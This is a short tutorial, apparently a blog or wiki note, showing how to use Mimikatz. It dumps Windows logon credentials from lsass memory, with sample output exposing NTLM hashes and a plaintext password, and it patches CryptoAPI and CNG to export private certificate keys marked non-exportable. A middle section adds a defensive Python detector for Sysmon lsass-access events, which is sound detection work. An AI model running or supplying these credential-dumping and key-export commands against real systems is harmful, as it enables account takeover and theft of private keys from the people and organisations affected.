Mimikatz

Mimikatz is a small tool that talks to the lsass.exe process; it is generally used to extract credentials.

First, enable the debug privilege:

mimikatz # privilege::debug
Privilege '20' OK

Then use the sekurlsa module to extract them.

mimikatz # sekurlsa::logonpasswords

At this point the plaintext password can be obtained.

Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Test
Domain            : feza-1
SID               : S-1-5-21-1982681257-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Test
         * Domain   : feza-1
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Test
         * Domain   : feza-1
         * Password : waza1234/
...
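
The command above only works because the tool opens lsass.exe with read access to its memory, which Sysmon records as Event ID 10 (ProcessAccess). As an added example that is not part of the original note, the following Python flags such events in constructed JSON-lines Sysmon records; the field names follow Sysmon's schema, while the allowlist path and the sample events are assumptions made up for the demo.

```python
"""Flag Sysmon Event ID 10 (ProcessAccess) records in which a process opened
lsass.exe with memory-read access, the access sekurlsa::logonpasswords needs.
Input is assumed to be JSON lines carrying Sysmon field names (constructed)."""
import json

PROCESS_VM_READ = 0x0010  # access-mask bit: read the target's memory

# Assumed allowlist of images that legitimately open lsass on this host.
ALLOWED_SOURCES = {r"c:\program files\windows defender\msmpeng.exe"}


def suspicious_lsass_access(event: dict) -> bool:
    """True when a non-allowlisted process opened lsass.exe with VM_READ set."""
    if event.get("EventID") != 10:
        return False
    target = event.get("TargetImage", "").lower()
    if not target.endswith("\\lsass.exe"):
        return False
    source = event.get("SourceImage", "").lower()
    if source in ALLOWED_SOURCES:
        return False
    granted = int(event.get("GrantedAccess", "0"), 16)
    return bool(granted & PROCESS_VM_READ)


def scan(lines):
    """Return (SourceImage, GrantedAccess) for every flagged record."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        if suspicious_lsass_access(event):
            hits.append((event["SourceImage"], event["GrantedAccess"]))
    return hits


# Constructed sample events, not real telemetry.
SAMPLE_LOG = r"""
{"EventID": 10, "SourceImage": "C:\\Tools\\mimikatz.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"}
{"EventID": 10, "SourceImage": "C:\\Program Files\\Windows Defender\\MsMpEng.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1410"}
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\taskmgr.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe"}
"""

if __name__ == "__main__":
    for src, access in scan(SAMPLE_LOG.splitlines()):
        print(f"ALERT: lsass memory read by {src} (GrantedAccess {access})")
```

The check keys on the access mask rather than the executable name, so renaming the binary does not change the result; a third-party EDR or backup agent that reads lsass legitimately would need to be added to the allowlist.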

Of course this is not its only use; it can also be used to extract certificates. First patch CryptoAPI and the CNG key isolation service so that keys marked non-exportable can still be exported:

mimikatz # crypto::capi
Local CryptoAPI patched

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # crypto::cng
"KeyIso" service patched

Then extract them.

mimikatz # crypto::certificates /systemstore:local_machine /store:my /export
 * System Store  : 'local_machine' (0x00020000)
 * Store         : 'my'

 0. example.domain.local
        Key Container  : example.domain.local
        Provider       : Microsoft Software Key Storage Provider
        Type           : CNG Key (0xffffffff)
        Exportable key : NO
        Key size       : 2048
        Public export  : OK - 'local_machine_my_0_example.domain.local.der'
        Private export : OK - 'local_machine_my_0_example.domain.local.pfx'

The public key is written to the DER file and the private key to the PFX file; the PFX is protected with the default password mimikatz.


This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.